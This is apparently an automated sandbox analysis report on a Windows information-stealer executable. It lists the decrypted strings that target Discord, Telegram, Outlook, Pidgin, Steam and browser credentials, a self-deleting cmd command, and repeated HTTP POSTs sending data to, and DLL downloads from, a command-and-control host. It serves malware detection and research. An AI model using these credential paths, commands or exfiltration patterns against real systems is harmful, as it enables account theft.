Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Installed Apps:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: All Users:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Current User:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Process List:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: system_info.txt
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: nss3.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \Temp\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: .exe
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: runas
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: open
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: /c start
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %DOCUMENTS%
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: %RECENT%
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: *.lnk
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: files
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \discord\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \Telegram Desktop\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: key_datas
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: map*
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Telegram
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: *.tox
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: *.ini
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Password
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: 00000001
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: 00000002
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: 00000003
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: 00000004
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Pidgin
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \.purple\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: accounts.xml
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: token:
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Software\Valve\Steam
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: SteamPath
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \config\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ssfn*
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: config.vdf
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: DialogConfig.vdf
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: libraryfolders.vdf
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: loginusers.vdf
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \Steam\
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: browsers
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: done
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: soft
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: https
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: POST
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: HTTP/1.1
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: hwid
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: build
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: token
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: file_name
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: file
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: message
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack String decryptor: screenshot.jpg
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00409540
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00406C10
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_004094A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004155A0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 0_2_004155A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat, 0_2_0040BF90
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CC76C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6CC76C80
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDCA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6CDCA9A0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDC44C0 PK11_PubEncrypt, 0_2_6CDC44C0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_6CDC4440 PK11_PrivDecrypt, 0_2_6CDC4440

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Unpacked PE file: 0.2.Wb9LZ5Sn1l.exe.400000.0.unpack
Uses 32bit PE files
Source: Wb9LZ5Sn1l.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 168.119.248.46:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137541385.000000006CCDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: C:\golopelipuniba\juye\sezuboniledi\kog_fuwahirah 90\dipone.pdb source: Wb9LZ5Sn1l.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137736690.000000006CE9F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: Wb9LZ5Sn1l.exe, 00000000.00000002.3137541385.000000006CCDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004015C0 VirtualProtect,FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryW,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECBHost: shaffatta.comContent-Length: 215Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBKKKEGIDBGHIDGDHDBFHost: shaffatta.comContent-Length: 268Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAAFBGDBKJJJKFIIIJJHost: shaffatta.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEHHost: shaffatta.comContent-Length: 6575Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBGHost: shaffatta.comContent-Length: 751Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDGHost: shaffatta.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFIHost: shaffatta.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/nss3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFIHost: shaffatta.comContent-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKFIIDGIEHIDGCGHIIHost: shaffatta.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGCFCFHCFHIECAEHDHHost: shaffatta.comContent-Length: 265Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHCHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDGHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAFIDBKEBFCBFIIIIIHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFCHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFIHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDGHJEBGIDGDGIJJKHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECBHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKFIIJJKJJJJJJEGDAHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDGHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDGHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJEBKECBAKFBGDGCBGDHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGDHJJDGHCAAAKEHIJHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBGHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDGDAKFHIEHJKFHDHDBHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEGCGCGIEGDHIDHJJEHHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHIJEHJDHIDHIDAEHCHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDGHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHDBGHJKFIDHJJJEBHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAFHDBGHJKFIDHJJJEBHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHCHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGIDHDAKJECBFHCBAAHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCAFHIJECGCAKFCGDBHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDGHIIJKEBGIDHIDBKJDHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIDBKKKKKFBGDGDHIDBGHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFBAFIDAECAKFHJDBAFHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJEGCAAECBFIEBGHJDGHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEBGHDBKEBGIDHJJEHCHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFCHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFIHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHDGHJEBGIDGDGIJJKHost: shaffatta.comContent-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCFIIEBKEGHJJJJJJDAAHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHCHost: shaffatta.comContent-Length: 1759Connection: Keep-AliveCache-Control: no-cache
